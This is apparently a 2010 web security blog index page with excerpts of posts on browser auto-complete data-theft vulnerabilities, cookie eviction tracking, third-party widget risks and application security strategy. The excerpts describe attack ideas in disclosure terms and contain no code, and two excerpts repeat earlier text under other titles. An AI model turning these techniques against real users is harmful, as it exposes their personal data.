|
Jeremiah Grossman Blog – Website Security Hot Topics
Website Vulnerability Assessments: Good, Fast, or Cheap - Pick TwoAugust 3, 2010
Website vulnerability assessments are part of any mature secure software development lifecycle. Today software, especially web-based software, is being updated at ever increasing speeds with the adoption of agile and other iterative development methodologies. To fit security into that fast paced life-cycle, application security must find a way to fit within the delivery requirements AND constraints. Upon immediately reading the headline, software managers will be well familiar with what I'm getting at. So website vulnerability assessments, ideally you want them good, fast and cheap.
Read Complete Post ››
Breaking Browsers: Hacking Auto-Complete (All Materials Available)August 2, 2010
BlackHat was one amazing ride. Over 5,000 people attended, a conference record. I got to see a ton of friends and colleagues and was fortunate enough to meet many new and interesting people. Of course a big highlight for me was my presentation, in which roughly 800 - 1,000 people showed up. A great turn out considering the talk was up against really solid and well-known presenters like Haroon Meer, Moxie Marlinspike, Christofer Hoff, and Ivan Ristic. Aside from some projector glitches and a failed cookie eviction demo everything went smoothly. From feedback in the hallway much of the audiences pin-drop silence was due to shock given how ridiculously simple yet effective these hacks were. :)
Read Complete Post ››
Patching Auto-Complete Vulnerabilities Not Enough, Cookie Eviction To The RescueJuly 29, 2010
Let's say a bad guy was aware of the Safari v4/5 and Internet Explorer v6/7 auto-complete vulnerabilities before public disclosure occurred or patches were made available (such as it is right now). They might want to maintain the ability to identify Web visitors even if they disabled form auto-complete or fixed the bug. All the bad guy would have to do is mass distribute their auto-complete code, like on an advertising network or a series of malware infected pages, obtain their victims personal information (name, email, address, etc.) and cookie them with a ID (i.e. domain = http://whoisthisperson/). When the person returns, even in a patched or feature disabled state, their browser (or the cookies within) would silently give up their identity. Read Complete Post ››
In Firefox We Can't Read Auto-Complete, but We Can Write To It (A Lot)!July 29, 2010
This is not exactly security related, just a really really annoying abuse case that takes advantage of auto-complete functionality. During my research I tried dozens of different methods attempting to get Firefox to allow an arbitrary website to read the data, but to no avail. Clearly the Mozilla development team was on top of their game. However, just because we can't read auto-complete data, doesn't mean we can't write to it... and en masse!
All you need is an iframe, a text field with arbitrary data, a form that posts to that iframe, and some javascript magic to automatically submit the form. Like so... Read Complete Post ››
Stealing AutoComplete Form Data In Internet Explorer 6 & 7 July 29, 2010
At the time of this writing Internet Explorer 6 & 7 collectively command 29% market share (~500M users), making them STILL the world's most widely used Web browser when combined together. Similar to the recent Safari AutoFill vulnerability, a malicious website may surreptitiously obtain an IE 6 & 7 users private information including their name (aliases), addresses, telephone numbers, credit card numbers, place of work, job title, search terms, secret questions & answers, etc. by simply abusing HTML form AutoComplete functionality. Furthermore, the attack may succeed even if the user has never been to the malicious website or provided any personal information. Read Complete Post ››
I Know Your Name, Where You Work, And Live (Safari v4 & v5)July 21, 2010
Right at the moment a Safari user visits a website, even if they've never been there before or entered any personal information, a malicious website can uncover their first name, last name, work place, city, state, and email address. Safari v4 & v5, with a combined market browser share of 4% (~83 million users), has a feature (Preferences > AutoFill > AutoFill web forms) enabled by default. Essentially we are hacking auto-complete functionality.
This feature AutoFill's HTML form text fields that have specific attribute names such as name, company, city, state, country, email, etc. Read Complete Post ››
Third-Party Web Widget Security FAQJuly 6, 2010
Millions of websites such as online news, blogs, e-commerce, banks, webmail, social networking and more utilize third-party hosted content on their webpages in the form of JavaScript, Adobe Flash, Microsoft Silverlight, HTML IFrames, and images. Often referred to as Web Widgets, common examples are banners (Google AdSense), search boxes (Yahoo), traffic counters (StatCounter), games (Pogo), videos (YouTube), Twitter / RSS feeds, user polls, security badges (VeriSign Secured Seal), social buttons (Facebook Like), etc. Tens of thousands currently exist for Web developers to choose from. While not widely understood or recognized, Web Widgets represent a serious and wide reaching security risk to websites, and their users, who use them. Read Complete Post ››
The "Low Hanging Fruit Scanner Strategy" Can Get You Into TroubleJune 25, 2010
Nothing drives a business like customer demand. When customers say they want X or they’ll go with competition, well, you do it or risk losing their business. Nearly 10 years ago this is where Microsoft found itself. Their product security was in terrible shape. No shortage of vulnerabilities resulting in widespread and devastating compromises with patches unpredictable and long in coming. Customers were fed up and threatened to dump Windows for Linux if things didn’t change. They meant it. Bill Gate’s, then Microsoft CEO, recognized the seriousness of the situation and authored the famous Trustworthy Computing memo.
“Over the last year it has become clear that ensuring .NET is a platform for Trustworthy Computing is more important than any other part of our work.” (emphasis mine). Read Complete Post ››Microsoft Security Is “Good Enough” And That’s The ProblemJune 21, 2010
Nothing drives a business like customer demand. When customers say they want X or they’ll go with competition, well, you do it or risk losing their business. Nearly 10 years ago this is where Microsoft found itself. Their product security was in terrible shape. No shortage of vulnerabilities resulting in widespread and devastating compromises with patches unpredictable and long in coming. Customers were fed up and threatened to dump Windows for Linux if things didn’t change. They meant it. Bill Gate’s, then Microsoft CEO, recognized the seriousness of the situation and authored the famous Trustworthy Computing memo.
“Over the last year it has become clear that ensuring .NET is a platform for Trustworthy Computing is more important than any other part of our work.” (emphasis mine). Read Complete Post ››
Replacing Happiness With Pride (Rugged)May 7, 2010
Developers are blissfully ignorant in knowing how insecure the code they write is. To overly simplify, an application security specialists job is to remove a developers bliss, their happiness. Happiness is not something a person will want to let go of willingly unless an equitable replacement is offered. If this is what it takes, no wonder application security is so challenging. Perhaps that is what the Rugged Software movement is all about. Replacing happiness with pride.
You know the drill -- an application security specialist sits down with a group of developers. The developers know anytime "security" comes around they’ll being asked to do more work. They must resist new tasks or revenue generating features will be placed on the back burner, product deadlines will slip, and upset their bosses. They’ll probably have to sit through training programs when they could be doing important work. And, for what?! To make sure nothing unexpected happens. The developers feel that this person, this ASS, is supposed to be the one responsible for “security” anyway, not them. They are doing someone else's job. Read Complete Post ››
Password Managers, Is This The Best Option User’s Have?March 19, 2010
Before reading the following, ask yourself if you’d recommend to the average user that they store their passwords in a local password manager.
Today there are four primary ways users lose control over their web-based passwords. Phishing Scams (email or SEO), Malware (installing malware or drive-by-downloads), website break-ins (SQLi, RFI, misconfiguration, etc.), and website brute-force attacks. For a user to protect themselves I’ve outlined the client-side technologies they can deploy (reason MFA is left out) and possible changes in their online behavior. Read Complete Post ››
Infrastructure vs. Application Security Spending March 3, 2010
Before reading the following, ask yourself if you’d recommend to the average user that they store their passwords in a local password manager.
Today there are four primary ways users lose control over their web-based passwords. Phishing Scams (email or SEO), Malware (installing malware or drive-by-downloads), website break-ins (SQLi, RFI, misconfiguration, etc.), and website brute-force attacks. For a user to protect themselves I’ve outlined the client-side technologies they can deploy (reason MFA is left out) and possible changes in their online behavior. Read Complete Post ››
The Web Won’t Be Safe, Let Alone Secure, Unless We Break It February 8, 2010
There are several security issues affecting all major Web browsers that have remained unaddressed for years (probably because the bad guys haven’t leveraged them aggressively enough, but the potential is there). The problem is that the only known ways to fix these issues (adequately) is to “break the Web” -- i.e. negatively impact the usability of a significant and unacceptable percentage of websites. Doing so is a nonstarter for any browser vendor looking to grow market share. The choice is clear for most vendors: Be less secure and adopted, rather than secure and obscure. This is what the choice comes down to. This is a topic deserving of further exploration. Read Complete Post ››
In Absence Of A Security StrategyJanuary 18, 2010
From experience working with all manner of organizations there are a number of unique security strategies present in the industry. Since every business operates differently, perhaps there is no right or wrong approach. That is, as long as the approach is properly aligned with the goals of the business. If not, the end result will lead to failure and in my opinion represents one of the largest, if not the largest, challenges presently facing the industry. That along with “justification,” which is probably the same thing.Read Complete Post ››
|
Jeremiah Grossman is a world-renowned expert in Web security, co-founder of the Web Application Security Consortium, and recently named to InfoWorld's Top 25 CTOs for 2007. He has authored dozens of articles and white papers, is credited with the discovery of many cutting-edge attack and defensive techniques, and co-author of the recently published book, Cross-Site Scripting Attacks. Mr. Grossman is frequently quoted in business and technology publications such as InfoWorld, USA Today, PC World, Dark Reading, SC Magazine, SecurityFocus, CNET, CSO Magazine, and InformationWeek.
|
